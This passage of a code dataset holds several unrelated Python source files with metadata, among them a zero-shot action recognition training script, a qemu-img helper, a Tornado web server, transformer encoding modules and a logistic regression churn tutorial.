detector')\nparser.add_argument('--use_train', action='store_true', default=False, help='use gan to generate')\n\nopt = parser.parse_args()\nprint(opt)\n\ndef generate_syn_feature(netG, classes, attribute, num):\n # generate num synthetic samples for each class in classes\n nclass = classes.size(0)\n syn_feature = torch.FloatTensor(nclass*num, opt.resSize)\n syn_label = torch.LongTensor(nclass*num) \n syn_att = torch.FloatTensor(num, opt.attSize)\n syn_noise = torch.FloatTensor(num, opt.nz)\n\n if opt.cuda:\n syn_att = syn_att.cuda()\n syn_noise = syn_noise.cuda()\n\n\n for i in range(nclass):\n iclass = classes[i]\n iclass_att = attribute[iclass]\n syn_att.copy_(iclass_att.repeat(num, 1))\n syn_noise.normal_(0, 1)\n with torch.no_grad():\n output = netG(Variable(syn_noise), Variable(syn_att))\n syn_feature.narrow(0, i*num, num).copy_(output.data.cpu())\n syn_label.narrow(0, i*num, num).fill_(iclass)\n \n return syn_feature, syn_label\n\n\nif opt.manualSeed is None:\n opt.manualSeed = random.randint(1, 10000)\nprint(\"Random Seed: \", opt.manualSeed)\nrandom.seed(opt.manualSeed)\ntorch.manual_seed(opt.manualSeed)\nif opt.cuda:\n torch.cuda.manual_seed_all(opt.manualSeed)\n\ncudnn.benchmark = True\n\nif torch.cuda.is_available() and not opt.cuda:\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n\n# load data\ndata = util.DATA_LOADER(opt)\nprint(\"# of training samples: \", data.ntrain)\n\n# initialize generator, discriminator and decoder\nnetVA = model.Encode_Vis_Att(opt)\nnetAV = model.Decode_Att_Vis(opt)\n# print nets\nprint(netVA)\nprint(netAV)\n\n##############################\nnetG = MLP_G(opt).cuda()\nnetG.load_state_dict(torch.load(\"netG.tar\")['state_dict'].state_dict())\nsyn_feature, syn_label = generate_syn_feature(netG, data.unseenclasses, data.attribute, opt.syn_num)\nseen_class = data.seenclasses.size(0)\nif opt.use_od:\n netOD = selector.ODDetector(data.train_feature.size(1), 512, seen_class).cuda()\n netOD.load_state_dict(torch.load(\"netOD.tar\")['state_dict'])\n od_seen_thresh = torch.load(\"netOD.tar\")['seen_thresh']\n od_unseen_thresh = torch.load(\"netOD.tar\")['unseen_thresh']\n od_thresh = 0.1\n #od_thresh = (od_unseen_thresh - od_seen_thresh) / 2\n #print(od_thresh)\n\n #netOD = 
selector.CLASSIFIER(data.train_feature, util.map_label(data.train_label, data.seenclasses), data, seen_class, syn_feature, syn_label, opt.cuda, _batch_size=128)\n #od_seen_thresh = netOD.thresh\n #od_unseen_thresh = netOD.unseen_thresh\n #netOD = netOD.model\n #torch.save({'state_dict':netOD.state_dict(), 'seen_thresh':od_seen_thresh, 'unseen_thresh':od_unseen_thresh}, 'netOD.tar')\n\nopt.num_seen = len(data.train_feature)\nif opt.use_gan:\n data.train_feature = torch.cat((data.train_feature, syn_feature), dim = 0)\n data.train_label = torch.cat((data.train_label, syn_label), dim = 0)\n\n##############################\n\nemb_criterion = nn.CosineEmbeddingLoss(margin=0)\nrecons_criterion = nn.MSELoss()\n# recons_criterion = nn.L1Loss() # L1 loss \n\ninput_res = torch.FloatTensor(opt.batch_size, opt.resSize)\ninput_att = torch.FloatTensor(opt.batch_size, opt.attSize)\ninput_label = torch.LongTensor(opt.batch_size)\nnoise = torch.FloatTensor(opt.batch_size, opt.nz)\none = torch.FloatTensor([1])\nmone = one * -1\n\nif opt.cuda:\n netVA.cuda()\n netAV.cuda()\n input_res, input_label = input_res.cuda(), input_label.cuda()\n noise, input_att = noise.cuda(), input_att.cuda()\n one = one.cuda()\n mone = mone.cuda()\n emb_criterion.cuda()\n recons_criterion.cuda()\n \ndef sample():\n # Sample a batch\n batch_feature, batch_label, batch_att = data.next_batch(opt.batch_size)\n if batch_feature.size(1) > opt.resSize:\n batch_feature = batch_feature[:, 0:opt.resSize]\n input_res.copy_(batch_feature)\n input_att.copy_(batch_att)\n input_label.copy_(util.map_label(batch_label, data.seenclasses))\n\n\ndef calc_gradient_penalty(netD, real_data, fake_data, input_att):\n # Gradient penalty of WGAN\n alpha = torch.rand(opt.batch_size, 1)\n alpha = alpha.expand(real_data.size())\n if opt.cuda:\n alpha = alpha.cuda()\n\n interpolates = alpha * real_data + ((1 - alpha) * fake_data)\n\n if opt.cuda:\n interpolates = interpolates.cuda()\n\n interpolates = Variable(interpolates, requires_grad=True)\n\n disc_interpolates = netD(interpolates, Variable(input_att))\n\n ones = torch.ones(disc_interpolates.size())\n if opt.cuda:\n ones = ones.cuda()\n\n gradients = autograd.grad(outputs=disc_interpolates, inputs=interpolates,\n grad_outputs=ones,\n create_graph=True, retain_graph=True, only_inputs=True)[0]\n\n gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean() * opt.lambda1\n return gradient_penalty\n\n\n# setup optimizer\noptimizerVA = optim.Adam(netVA.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\noptimizerAV = optim.Adam(netAV.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n \n# Start training\nfor epoch in range(opt.nepoch):\n # set to training mode\n netVA.train()\n netAV.train()\n\n mean_lossAV, mean_lossVA = 0, 0\n mean_lossM = 0 \n for i in range(0, data.ntrain, opt.batch_size):\n ############################\n # (1) Update Vis to Att\n ###########################\n for p in netVA.parameters(): # reset requires_grad\n p.requires_grad = True # they are set to False below in netG update\n for p in netAV.parameters(): # reset requires_grad\n p.requires_grad = False # they are set to False below in netG update\n\n for iter_d in range(opt.critic_iter):\n sample()\n netVA.zero_grad()\n # train with realG, sample a mini-batch\n input_resv = Variable(input_res) #I3D feature\n input_attv = Variable(input_att) #semantic attribute\n \n recons_a, mix_f_a = netVA(input_resv) #reconstruct semantic attribute\n VA_cost = recons_criterion(recons_a, input_attv)\n\n VA_cost.backward()\n optimizerVA.step()\n 
mean_lossVA += VA_cost.item()\n\n \n ###########################\n # (2) Update Att to Vis\n ###########################\n for p in netVA.parameters(): # reset requires_grad\n p.requires_grad = False # avoid computation\n for p in netAV.parameters(): # reset requires_grad\n p.requires_grad = True # avoid computation\n for iter_d in range(opt.critic_iter):\n sample()\n netAV.zero_grad()\n # train with realG, sample a mini-batch\n input_resv = Variable(input_res) #I3D feature\n input_attv = Variable(input_att) #semantic attribute\n \n # Decoder training\n recons_v, mix_f_v = netAV(input_attv) #reconstruct visual feature\n AV_cost = recons_criterion(recons_v, input_resv)\n AV_cost.backward()\n optimizerAV.step()\n mean_lossAV += AV_cost.item()\n \n ###########################\n # (3) Update Mix Domain\n ###########################\n\n for p in netVA.parameters(): # reset requires_grad\n p.requires_grad = True # avoid computation\n for p in netAV.parameters(): # reset requires_grad\n p.requires_grad = True # avoid computation\n\n for iter_d in range(opt.critic_iter):\n sample()\n netAV.zero_grad()\n netVA.zero_grad()\n # train with realG, sample a mini-batch\n input_resv = Variable(input_res) #I3D feature\n input_attv = Variable(input_att) #semantic attribute\n \n # Decoder training\n recons_v, mix_f_v = netAV(input_attv) #reconstruct visual feature\n recons_a, mix_f_a = netVA(input_resv) #reconstruct semantic attribute\n M_cost = recons_criterion(mix_f_v, mix_f_a)\n\n M_cost.backward()\n optimizerAV.step()\n optimizerVA.step()\n mean_lossM += M_cost.item()\n\n\n \n mean_lossVA /= opt.critic_iter * data.ntrain / opt.batch_size \n mean_lossAV /= opt.critic_iter * data.ntrain / opt.batch_size\n mean_lossM /= data.ntrain / opt.batch_size\n \n print('[%d/%d] Loss_VA: %.4f Loss_AV: %.4f, Loss_M: %.4f' % (epoch, opt.nepoch, mean_lossVA, mean_lossAV, mean_lossM))\n\n\n ##########eval_unseen#########\n\n if opt.use_od:\n seen_acc, unseen_acc, H, total_acc, seen_od, unseen_od, total_od_acc = eval_od(netAV, netVA, netOD, od_thresh, data, opt)\n print('Test with OD [%d/%d]: Unseen: %.4f, Seen: %.4f, H: %.4f, Total: %.4f' % (epoch, opt.nepoch, unseen_acc, seen_acc, H, total_acc))\n print('Test with OD [%d/%d]: Unseen_od: %.4f, Seen_od: %.4f, Total_od: %.4f' % (epoch, opt.nepoch, unseen_od, seen_od, total_od_acc))\n else:\n total_acc, seen_acc, unseen_acc = eval_gzsl(netAV, netVA, data, opt)\n eps = 1e-12\n H = 2*seen_acc*unseen_acc / (seen_acc + unseen_acc + eps)\n print('Test [%d/%d]: Unseen: %.4f, Seen: %.4f, H: %.4f, Mix: %.4f' % (epoch, opt.nepoch, unseen_acc, seen_acc, H, total_acc))\n\n\n \n","sub_path":"online_action_ucf/my_action_gan_od.py","file_name":"my_action_gan_od.py","file_ext":"py","file_size_in_byte":13045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"95659899","text":"# coding: utf-8\n\nfrom .Sale import Sale\nfrom .Tree import Tree\n\nclass Main:\n\n # Expected date input format: YYYY_MM (e.g. 2017_02)\n def __init__(self):\n self.treeFilial = Tree()\n self.treeDate = Tree()\n\n self.load_file('vendas.txt')\n self.search(min_filial=10, max_filial=20, min_date='2017_01', max_date='2017_06')\n\n def load_file(self, path):\n file = open(path,'r')\n lines = file.readlines()\n\n id = 1\n for line in lines:\n line_list = line.split(',')\n sale = Sale(id,line_list[0],line_list[1],line_list[2],line_list[3])\n self.treeFilial.add(sale, key='filial')\n self.treeDate.add(sale, key=\"date\")\n id += 1\n\n def search(self, min_filial=None, 
max_filial=None, min_date=None, max_date=None):\n if min_date is None and max_date is None: flag = 1\n elif min_filial is None and max_filial is None: flag = 2\n else: flag = 3\n\n nodes_date, nodes_filial = None, None\n\n if flag != 1:\n print(\"Árvore Data\")\n self.treeDate.print_tree(key='date')\n nodes_date = self.treeDate.search_range(min_date,max_date)\n print('Total de vendas de todas as filias com data entre {} e {}:'.format(min_date, max_date), self.treeFilial.sum_sales(dates=nodes_date))\n\n if flag != 2:\n print(\"\\n\\nArvore Filial\")\n self.treeFilial.print_tree(key='filial')\n nodes_filial = self.treeFilial.search_range(min_filial, max_filial)\n print('Total vendas das filiais {} e {}:'.format(min_filial, max_filial), self.treeFilial.sum_sales(filials=nodes_filial))\n\n if flag == 3:\n sum_sales = Tree.sum_sales(nodes_filial, nodes_date)\n print(\"\\nTotal de vendas das filiais {} e {} entre os meses de {} e {}:\".format(min_filial,max_filial, min_date, max_date), sum_sales)\n\n\n\n\nif __name__ == \"__main__\":\n program = Main()\n","sub_path":"TIC10002-Py/src/uff/ic/lleme/tic10002/trabalhos/s20171/Adriel_Araujo/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"19932764","text":"#!/usr/bin/env python\n#\n# qemu_img.py - Helper for 'qemu-img'\n#\n# February 2015, Glenn F. Matthews\n# Copyright (c) 2013-2015 the COT project developers.\n# See the COPYRIGHT.txt file at the top-level directory of this distribution\n# and at https://github.com/glennmatthews/cot/blob/master/COPYRIGHT.txt.\n#\n# This file is part of the Common OVF Tool (COT) project.\n# It is subject to the license terms in the LICENSE.txt file found in the\n# top-level directory of this distribution and at\n# https://github.com/glennmatthews/cot/blob/master/LICENSE.txt. No part\n# of COT, including this file, may be copied, modified, propagated, or\n# distributed except according to the terms contained in the LICENSE.txt file.\n\n\"\"\"Give COT access to ``qemu-img`` for manipulating disk image formats.\n\nhttp://www.qemu.org\n\"\"\"\n\nimport logging\nimport os.path\nimport re\nfrom distutils.version import StrictVersion\n\nfrom .helper import Helper\n\nlogger = logging.getLogger(__name__)\n\n\nclass QEMUImg(Helper):\n \"\"\"Helper provider for ``qemu-img`` (http://www.qemu.org).\n\n **Methods**\n\n .. autosummary::\n :nosignatures:\n\n install_helper\n get_disk_format\n get_disk_capacity\n convert_disk_image\n create_blank_disk\n \"\"\"\n\n def __init__(self):\n \"\"\"Initializer.\"\"\"\n super(QEMUImg, self).__init__(\n \"qemu-img\",\n version_regexp=\"qemu-img version ([0-9.]+)\")\n self.vmdktool = None\n\n def install_helper(self):\n \"\"\"Install ``qemu-img``.\"\"\"\n if self.path:\n logger.warning(\"Tried to install {0} -- \"\n \"but it's already available at {1}!\"\n .format(self.name, self.path))\n return\n logger.info(\"Installing 'qemu-img'...\")\n if not (Helper.apt_install('qemu-utils') or\n Helper.port_install('qemu') or\n Helper.yum_install('qemu-img')):\n raise NotImplementedError(\n \"Unsure how to install qemu-img.\\n\"\n \"See http://en.wikibooks.org/wiki/QEMU/Installing_QEMU\")\n logger.info(\"Successfully installed 'qemu-img'.\")\n\n def get_disk_format(self, file_path):\n \"\"\"Get the major disk image format of the given file.\n\n .. 
warning::\n If :attr:`file_path` refers to a file which is not a disk image at\n all, this function will return ``'raw'``.\n\n :param str file_path: Path to disk image file to inspect.\n :return: Disk image format (``'vmdk'``, ``'raw'``, ``'qcow2'``, etc.)\n \"\"\"\n output = self.call_helper(['info', file_path])\n # Read the format from the output\n match = re.search(\"file format: (\\S*)\", output)\n if not match:\n raise RuntimeError(\"Did not find file format string in \"\n \"the output from qemu-img:\\n{0}\"\n .format(output))\n file_format = match.group(1)\n logger.info(\"File format of '{0}' is '{1}'\"\n .format(os.path.basename(file_path), file_format))\n return file_format\n\n def get_disk_capacity(self, file_path):\n \"\"\"Get the storage capacity of the given disk image.\n\n :param str file_path: Path to disk image file to inspect\n :return: Disk capacity, in bytes\n \"\"\"\n output = self.call_helper(['info', file_path])\n match = re.search(r\"(\\d+) bytes\", output)\n if not match:\n raise RuntimeError(\"Did not find byte count in the output from \"\n \"qemu-img:\\n{0}\"\n .format(output))\n capacity = match.group(1)\n logger.verbose(\"Disk {0} capacity is {1} bytes\".format(file_path,\n capacity))\n return capacity\n\n def convert_disk_image(self, file_path, output_dir,\n new_format, new_subformat=None):\n \"\"\"Convert the given disk image to the requested format/subformat.\n\n If the disk is already in this format then it is unchanged;\n otherwise, will convert to a new disk in the specified output_dir\n and return its path.\n\n Current supported conversions:\n\n * .vmdk (any format) to .vmdk (streamOptimized)\n * .img to .vmdk (streamOptimized)\n\n :param str file_path: Disk image file to inspect/convert\n :param str output_dir: Directory to place converted image into, if\n needed\n :param str new_format: Desired final format\n :param str new_subformat: Desired final subformat\n :return:\n * :attr:`file_path`, if no conversion was required\n * or a file path in :attr:`output_dir` containing the converted image\n\n :raise NotImplementedError: if the :attr:`new_format` and/or\n :attr:`new_subformat` are not supported conversion targets.\n \"\"\"\n file_name = os.path.basename(file_path)\n (file_string, file_extension) = os.path.splitext(file_name)\n\n new_file_path = None\n if new_format == 'raw':\n new_file_path = os.path.join(output_dir, file_string + '.img')\n logger.info(\"Invoking qemu-img to convert {0} into raw image {1}\"\n .format(file_path, new_file_path))\n self.call_helper(['convert', '-O', 'raw',\n file_path, new_file_path])\n elif new_format == 'vmdk' and new_subformat == 'streamOptimized':\n if self.version >= StrictVersion(\"2.1.0\"):\n new_file_path = os.path.join(output_dir, file_string + '.vmdk')\n # qemu-img finally supports streamOptimized - yay!\n logger.info(\"Invoking qemu-img to convert {0} to \"\n \"streamOptimized VMDK {1}\"\n .format(file_path, new_file_path))\n self.call_helper(['convert', '-O', 'vmdk',\n '-o', 'subformat=streamOptimized',\n file_path, new_file_path])\n else:\n raise NotImplementedError(\"qemu-img is unable to convert to \"\n \"stream-optimized VMDK format prior \"\n \"to version 2.1.0 - you have {0}\"\n .format(self.version))\n else:\n raise NotImplementedError(\"No support for converting disk image \"\n \"to format {0} / subformat {1}\"\n .format(new_format, new_subformat))\n\n return new_file_path\n\n def create_blank_disk(self, file_path, capacity, file_format=None):\n \"\"\"Create an unformatted disk image at the requested 
location.\n\n :param str file_path: Desired location of new disk image\n :param capacity: Disk capacity. A string like '16M' or '1G'.\n :param str file_format: Desired image format (if not specified, this\n will be derived from the file extension of :attr:`file_path`)\n \"\"\"\n if not file_format:\n # Guess format from file extension\n file_format = os.path.splitext(file_path)[1][1:]\n if not file_format:\n raise RuntimeError(\n \"Unable to guess file format from desired filename {0}\"\n .format(file_path))\n if file_format == 'img':\n file_format = 'raw'\n logger.debug(\"Guessed file format is {0}\".format(file_format))\n\n logger.info(\"Calling qemu-img to create {0} {1} image\"\n .format(capacity, file_format))\n self.call_helper(['create', '-f', file_format,\n file_path, capacity])\n","sub_path":"COT/helpers/qemu_img.py","file_name":"qemu_img.py","file_ext":"py","file_size_in_byte":7763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"292855456","text":"from tkinter import *\nimport sys\nimport time\n\ndef getTime():\n currentTime = time.strftime(\"%H:%M:%S\")\n getTimeLabel.config(text=currentTime)\n getTimeLabel.after(200, getTime)\n\nroot = Tk()\nroot.geometry(\"500x250\")\nroot.title(\"Welcome to Digital Clock\")\nroot.wm_iconbitmap(\"clk.ico\")\n\n##making the different labels for our program\nwelcomeLabel = Label(root, text=\"Digital Clock\", font=(\"Arial\", 30, \"bold\"), padx=25, pady=15)\ngetTimeLabel = Label(root, font=(\"Arial\", 30, \"bold\"), bg=\"white\", foreground=\"green\", pady=25, padx=100)\n## we need to call our function now which will give us the time \ngetTime() \nhmsLabel = Label(root, text=\"hrs min sec\", font=(\"Arial\", 15, \"bold\"))\n\n##placing order of different labels using Pack Manager\nwelcomeLabel.pack()\ngetTimeLabel.pack()\nhmsLabel.pack()\n\nroot.mainloop()\n","sub_path":"digital_clock_with_tkinter/mainClock.py","file_name":"mainClock.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"60919585","text":"\n# This is a filesystem watchdog responsible for writing from icecast/icegenerator log file to a database.\n# Every time the log file changes, icecast log file is the only place where the song history is stored.\n\n\nfrom datetime import datetime as dt\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\nfrom application.models import db, RecordDB\nfrom application.parser import get_last_n_records, parse_record\nfrom application import create_app\n\napp = create_app()\n\nif not app.config[\"OS\"] == \"Windows_NT\":\n class MyHandler(FileSystemEventHandler):\n \"\"\" Class monotoring log file from Icecast server. \"\"\"\n\n def on_modified(self, event):\n \"\"\" Append currently played song to a database. \"\"\"\n if event.event_type == \"modified\" and event.src_path == app.config[\"LINUX_LOG_PATH\"]:\n title, artist, album, started_at = parse_record(get_last_n_records())\n with app.app_context():\n try:\n record = RecordDB(title=title,\n artist=artist,\n album=album,\n started_at=started_at,\n added_at=dt.now())\n db.session.add(record)\n db.session.commit()\n except Exception as e:\n print(e)\n\n def notify():\n \"\"\" Get notified when the Icecast log changes. 
\"\"\"\n event_handler = MyHandler()\n observer = Observer()\n observer.schedule(event_handler, path=\"/var/log/icecast/\", recursive=False)\n observer.start()","sub_path":"application/notifier.py","file_name":"notifier.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"102984989","text":"\nimport tornado.ioloop\nimport tornado.web\nimport tornado.gen\nimport tornado.websocket\n\nimport os.path\nimport sys\nimport math\nimport time\n\nimport logging\n\ngDir_root = os.path.dirname(__file__)\ngDir_ui_static = os.path.join(gDir_root, 'ui/static')\n\nsys.path.insert(0, os.path.abspath(os.path.join(gDir_root, 'code')))\n\nimport ktsrv\n\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\n\nclass MainHandler(tornado.web.RequestHandler):\n\tdef initialize(self, code_entry):\n\t\tself.code_entry = code_entry\n\n\tdef get(self):\n\t\tpath_pref = None\n\t\tpath_file = os.path.basename(self.request.path)\n\t\tif self.code_entry == 'home':\n\t\t\treturn self.render('index.html')\n\t\telif self.code_entry == 'views':\n\t\t\tpath_pref = 'views'\n\t\t_js_ver = math.floor(time.time() * 1000)\n\t\treturn self.render(os.path.join(path_pref, path_file),\n\t\t\t\t\t\t\t\tdev_js_ver=_js_ver)\n\nclass HomeHandler(tornado.web.StaticFileHandler):\n\tdef validate_absolute_path(self, root, absolute_path):\n\t\tif self.request.uri == '/':\n\t\t\tabsolute_path = os.path.join(absolute_path, \"html\")\n\t\t#print(\"HomeHandler: root=\" + root + \", absolute_path=\" + absolute_path + \", request=\" + str(self.request))\n\t\treturn super(HomeHandler, self).validate_absolute_path(root, absolute_path)\n\nclass DemoHandler(tornado.web.RequestHandler):\n\tdef get(self):\n\t\tpath_file = os.path.basename(self.request.path)\n\t\treturn self.render(path_file)\n\n\tdef get_template_path(self):\n\t\treturn os.path.join(gDir_root, 'demo/html')\n\nclass MiscHandler(tornado.web.StaticFileHandler):\n\tdef validate_absolute_path(self, root, absolute_path):\n\t\tpath_file = os.path.basename(self.request.path)\n\t\t#print(\"MiscHandler: root=\" + root + \", absolute_path=\" + absolute_path + \", request=\" + str(self.request))\n\t\tif os.path.isfile(os.path.join(gDir_root, 'code/js', path_file)):\n\t\t\treturn os.path.join(gDir_root, 'code/js', path_file)\n\t\treturn super(MiscHandler, self).validate_absolute_path(root, absolute_path)\n\nclass AppChartServer(tornado.web.Application):\n\tdef __init__(self):\n\t\tsettings = dict(\n\t\t\tdebug=True,\n\t\t\ttemplate_path=os.path.join(gDir_root, 'ui/templates'),\n\t\t\tstatic_path=os.path.join(gDir_root, 'ui/static'),\n\t\t)\n\t\thandlers = [\n\t\t\t(r'/views/.*\\.html', MainHandler, { 'code_entry': 'views', }),\n\t\t\t(r'/demo/.*\\.html', DemoHandler),\n\t\t\t(r'/ws/(.*)', ktsrv.WebSockHandler),\n\t\t\t(r'/(css/.+\\.css)', MiscHandler, { 'path': settings['static_path'] }),\n\t\t\t(r'/(js/.+\\.js)', MiscHandler, { 'path': settings['static_path'] }),\n\t\t\t(r'/(favicon.ico)', MiscHandler, { 'path': settings['static_path'] }),\n\t\t\t(r'/()', HomeHandler, { 'path': 'ui/static', 'default_filename': 'index.html', }),\n\t\t]\n\t\tsuper(AppChartServer, self).__init__(handlers, **settings)\n\ndef main():\n\tapp = AppChartServer()\n\tapp.listen(8888)\n\ttornado.ioloop.IOLoop.current().start()\n\nif __name__ == 
\"__main__\":\n\tmain()\n\n","sub_path":"appChartServer.py","file_name":"appChartServer.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"494644323","text":"from fetch_tokenizers import PAD_IDX\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass PositionWiseFeedForward(nn.Module):\n def __init__(self, d_model, d_ff, dropout=0.1):\n super(PositionWiseFeedForward, self).__init__()\n self.w_1 = nn.Linear(d_model, d_ff)\n self.w_2 = nn.Linear(d_ff, d_model)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x):\n return self.w_2(self.dropout(F.relu(self.w_1(x))))\n\nclass PositionwiseFeedForward(nn.Module):\n \"Implements FFN equation.\"\n def __init__(self, d_model, d_ff, dropout=0.1):\n super(PositionwiseFeedForward, self).__init__()\n self.w_1 = nn.Linear(d_model, d_ff)\n self.w_2 = nn.Linear(d_ff, d_model)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x):\n return self.w_2(self.dropout(F.relu(self.w_1(x))))\n\nclass Embeddings(nn.Module):\n def __init__(self, d_model, vocab):\n super(Embeddings, self).__init__()\n self.emb = nn.Embedding(vocab, d_model, padding_idx=PAD_IDX)\n self.d_model = d_model\n\n def forward(self, x):\n return self.emb(x.long()) * math.sqrt(self.d_model)\n\nclass PositionalEncoding(nn.Module):\n def __init__(self, d_model, dropout, max_len=5000):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n\n positional_embedding = torch.zeros((max_len, d_model))\n position = torch.arange(0, max_len).reshape(max_len, 1)\n div = torch.exp(torch.arange(0, d_model, 2) * -(math.log(10000) / d_model))\n\n positional_embedding[:, 0::2] = torch.sin(position * div)\n positional_embedding[:, 1::2] = torch.cos(position * div)\n positional_embedding = positional_embedding.unsqueeze(-2)\n\n self.register_buffer('positional_embedding', positional_embedding)\n\n def forward(self, x):\n x = x + self.positional_embedding[:x.size(0),:]\n return self.dropout(x)","sub_path":"model/position.py","file_name":"position.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"559526823","text":"from django.conf.urls import url\n\nimport views\nfrom scnvsim import check_reference_ready\n\napp_name = 'webapp'\n\nurlpatterns = [\n url(r'^$', views.home, name='home'),\n url(r'^simulation$', views.simulation, name='simulation'),\n url(r'^params$', views.params, name='params'),\n]\n\ncheck_reference_ready()","sub_path":"webapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"183329892","text":"#===========================IMPORTING TREQUIRED LIBRARIES AND DATASETS==========================\n\n#===========================importing libraries, modules and packages======================\nimport pandas as pd\nimport pylab as pl\nimport numpy as np\nimport scipy.optimize as opt\nimport matplotlib.pyplot as plt\nimport itertools\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import jaccard_score\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.metrics import log_loss\n# %matplotlib inline #needed in jupyter 
notebooks\n\n#==================Loading the data into the project=================================\nchurn_df = pd.read_csv(\"ChurnData.csv\")\ndata = churn_df.head()\nprint(data)\n\n\n\n#===================================DATA PREPROCESSING AND SELECTION==================================\n\n#============================================Data selection=====================================\nchurn_df = churn_df[['tenure', 'age', 'address', 'income', 'ed', 'employ', 'equip', 'callcard', 'wireless','churn']]\nchurn_df['churn'] = churn_df['churn'].astype('int')\ndata = churn_df.head()\nprint(data)\n\ndata_shape = churn_df.shape\nprint(data_shape)\n\n#=======================================Features and Target selection===========================\nX = np.asarray(churn_df[['tenure', 'age', 'address', 'income', 'ed', 'employ', 'equip']])\nX[0:5]\nprint(X)\n\ny = np.asarray(churn_df['churn'])\ny [0:5]\nprint(y)\n\n#======================================Normalize dataset===============================\nX = preprocessing.StandardScaler().fit(X).transform(X)\nX[0:5]\nprint(X)\n\n\n\n#==============================================TRAIN/TEST SPLIT========================================\n\nX_train, X_test, y_train, y_test = train_test_split( X, y, test_size=0.2, random_state=4)\nprint ('Train set:', X_train.shape, y_train.shape)\nprint ('Test set:', X_test.shape, y_test.shape)\n\n\n\n#=================================================MODELLING===========================================\n\n#===================================Logistic Regression with SCIKIT-LEARN===============================\nLR = LogisticRegression(C=0.01, solver='liblinear').fit(X_train,y_train)\n #other scikit-learn solvers are ‘newton-cg’, ‘lbfgs’, ‘liblinear’, ‘sag’, ‘saga’ solvers\n #the version of Logistic Regression in Scikit-learn, support regularization. Regularization is a technique used to solve the overfitting problem in machine learning models. C parameter indicates inverse of regularization strength which must be a positive float\nLR\n\n\n\n#============================================PREDICTION=====================================\nyhat = LR.predict(X_test)\nyhat\n\nyhat_prob = LR.predict_proba(X_test)\n #predict_proba returns estimates for all classes, ordered by the label of classes. 
So, the first column is the probability of class 1, P(Y=1|X), and second column is probability of class 0, P(Y=0|X):\nyhat_prob\nprint(yhat_prob)\n\n\n#============================================EVALUATION========================================\n\n#===========================================Jaccard index========================================\njaccard_similarity_score = jaccard_score(yhat, y_test)\nprint(\"Jacccard Similarity Score: \", jaccard_similarity_score)\n\n\n#=========================================Confusion Matrix======================================\ndef plot_confusion_matrix(cm, classes, normalize = False, title = 'Confusion matrix', cmap = plt.cm.Blues):\n \n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\nprint(confusion_matrix(y_test, yhat, labels=[1,0]))\n\n#=======================plotting the confusion matrix\n# Compute confusion matrix\ncnf_matrix = confusion_matrix(y_test, yhat, labels=[1,0])\nnp.set_printoptions(precision=2)\n\n# Plot non-normalized confusion matrix\nplt.figure()\nplot_confusion_matrix(cnf_matrix, classes=['churn=1','churn=0'],normalize= False, title='Confusion matrix')\n\n#Report result and comparisons\nprint (classification_report(y_test, yhat))\n #Precision is a measure of the accuracy provided that a class label has been predicted. It is defined by: precision = TP / (TP + FP)\n #Recall is true positive rate. 
